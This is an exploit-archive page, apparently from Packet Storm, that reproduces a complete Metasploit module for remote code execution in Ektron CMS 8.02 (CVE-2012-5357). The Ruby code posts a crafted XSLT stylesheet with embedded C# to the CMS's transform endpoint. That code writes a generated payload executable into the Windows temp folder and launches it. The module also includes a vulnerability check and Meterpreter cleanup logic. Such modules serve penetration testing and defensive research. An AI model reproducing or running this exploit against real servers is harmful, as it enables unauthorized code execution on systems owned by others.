what you don't know can hurt you

Ektron 8.02 XSLT Transform Remote Code Execution

Ektron 8.02 XSLT Transform Remote Code Execution
Posted Dec 5, 2012
Authored by unknown, juan vazquez | Site metasploit.com

This Metasploit module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform, using a XSLT controlled by the user. The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK SERVICE privileges.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2012-5357
MD5 | cfc9df9eacf0965d427078f202cfc0ac

Ektron 8.02 XSLT Transform Remote Code Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/file_dropper'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
vulnerability exists due to the insecure usage of XslCompiledTransform, using a
XSLT controlled by the user. The module has been tested successfully on Ektron CMS
8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
SERVICE privileges.
},
'Author' => [
'Unknown', # Vulnerability discovery, maybe Richard Lundeen from http://webstersprodigy.net/ ?
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5357'],
[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2012'
))

register_options(
[
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
], self.class )
end

def check

fingerprint = rand_text_alpha(5 + rand(5))
xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
XSLT

res = send_request_cgi(
{
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
'headers' => {
"Referer" => build_referer
},
'vars_post' => {
"xml" => rand_text_alpha(5 + rand(5)),
"xslt" => xslt_data
}
})

if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end


def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end

@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
win_file = "#{windir}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
# read-only flag with a command.
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
print_good("Deleted #{file}")
true
rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to delete #{win_file}")
false
end

end
end

end

def uri_path
uri_path = target_uri.path
uri_path << "/" if uri_path[-1, 1] != "/"
uri_path
end

def build_referer
if datastore['SSL']
schema = "https://"
else
schema = "http://"
end

referer = schema
referer << rhost
referer << ":#{rport}"
referer << uri_path
referer
end

def exploit

print_status("Generating the EXE Payload and the XSLT...")
exe_data = generate_payload_exe
exe_string = Rex::Text.to_hex(exe_data)
exename = rand_text_alpha(5 + rand(5))
fingerprint = rand_text_alpha(5 + rand(5))
xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
char[] charData = "#{exe_string}".ToCharArray();
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
for (int i = 0; i < charData.Length; i++)
{
bw.Write( (byte) charData[i]);
}
bw.Close();
fs.Close();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
p.Start();
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
XSLT

print_status("Trying to run the xslt transformation...")
res = send_request_cgi(
{
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",
'headers' => {
"Referer" => build_referer
},
'vars_post' => {
"xml" => rand_text_alpha(5 + rand(5)),
"xslt" => xslt_data
}
})
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
print_good("Exploitation was successful")
register_file_for_cleanup("#{exename}.txt")
else
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
end

end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    15 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close